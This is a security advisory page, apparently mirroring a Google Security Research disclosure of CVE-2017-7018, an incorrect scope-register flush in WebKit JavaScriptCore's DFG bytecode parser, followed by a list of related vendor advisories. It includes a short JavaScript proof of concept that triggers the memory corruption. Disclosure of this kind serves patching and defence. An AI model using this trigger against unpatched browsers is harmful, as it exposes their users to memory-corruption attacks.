Lucene search
Google Security Research1337DAY-ID-28184HistoryJul 25, 2017 - 12:00 a.m.
WebKit JSC Incorrect Scope Register Handling Vulnerability
2017-07-2500:00:00
Google Security Research
0day.today
15
0.061 Low
EPSS
Percentile
92.7%
WebKit suffers from a JSC incorrect scope register handling in DFG::ByteCodeParser::flush(InlineStackEntry* inlineStackEntry).
WebKit: JSC: Incorrect scope register handling in DFG::ByteCodeParser::flush(InlineStackEntry* inlineStackEntry)
CVE-2017-7018
Here's a snippet of DFG::ByteCodeParser::flush(InlineStackEntry* inlineStackEntry).
void flush(InlineStackEntry* inlineStackEntry)
{
...
if (m_graph.needsScopeRegister())
flush(m_codeBlock->scopeRegister()); <<--- (a)
}
At (a), it should flush the scope register of |inlineStackEntry->m_codeBlock| instead of |m_codeBlock|. But it doesn't. As a result, the scope register of |inlineStackEntry->m_codeBlock| may have an incorrect offset in the stack layout phase.
PoC:
function f() {
(function () {
eval('1');
f();
}());
throw 1;
}
f();
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
# 0day.today [2018-02-19] #Related
debiancve
debiancve
CVE-2017-7018
2017-07-20 16:29:00
ubuntucve
ubuntucve
CVE-2017-7018
2017-07-20 00:00:00
packetstorm
packetstorm
WebKit JSC Incorrect Scope Register Handling
2017-07-25 00:00:00
cve
cve
CVE-2017-7018
2017-07-20 16:29:00
prion
prion
Memory corruption
2017-07-20 16:29:00
nessus
nessus
Fedora 26 : webkitgtk4 (2017-24bddb96b5)
2017-07-28 00:00:00
Fedora 25 : webkitgtk4 (2017-73d6a0dfbb)
2017-07-31 00:00:00
Fedora 24 : webkitgtk4 (2017-9d572cc64a)
2017-08-11 00:00:00
archlinux
archlinux
[ASA-201707-25] webkit2gtk: multiple issues
2017-07-26 00:00:00
fedora
fedora
[SECURITY] Fedora 24 Update: webkitgtk4-2.16.6-1.fc24
2017-08-07 20:18:27
[SECURITY] Fedora 25 Update: webkitgtk4-2.16.6-1.fc25
2017-07-31 00:22:09
[SECURITY] Fedora 26 Update: webkitgtk4-2.16.6-1.fc26
2017-07-27 16:54:47
openvas
openvas
Fedora Update for webkitgtk4 FEDORA-2017-9d572cc64a
2017-08-08 00:00:00
Fedora Update for webkitgtk4 FEDORA-2017-73d6a0dfbb
2017-08-04 00:00:00
Mageia: Security Advisory (MGASA-2017-0228)
2022-01-28 00:00:00
mageia
mageia
Updated webkit2 packages fix security vulnerability
2017-07-30 11:17:28
ubuntu
ubuntu
WebKitGTK+ vulnerabilities
2017-08-02 00:00:00
gentoo
gentoo
WebKitGTK+: Multiple Vulnerabilities
2017-10-13 00:00:00
apple
apple
About the security content of iCloud for Windows 6.2.2
2017-07-19 00:00:00
About the security content of iCloud for Windows 6.2.2 - Apple Support
2017-07-19 05:37:40
About the security content of iTunes 12.6.2 for Windows - Apple Support
2017-07-19 05:43:08
kaspersky
kaspersky
KLA11075 Multiple vulnerabilities in Apple iTunes
2017-07-19 00:00:00
freebsd
freebsd
webkit2-gtk3 -- multiple vulnerabilities
2017-07-24 00:00:00
suse
suse
Security update for webkit2gtk3 (important)
2017-11-06 15:08:25
Security update for webkit2gtk3 (important)
2017-11-10 18:22:30
Security update for webkit2gtk3 (important)
2018-02-01 00:14:30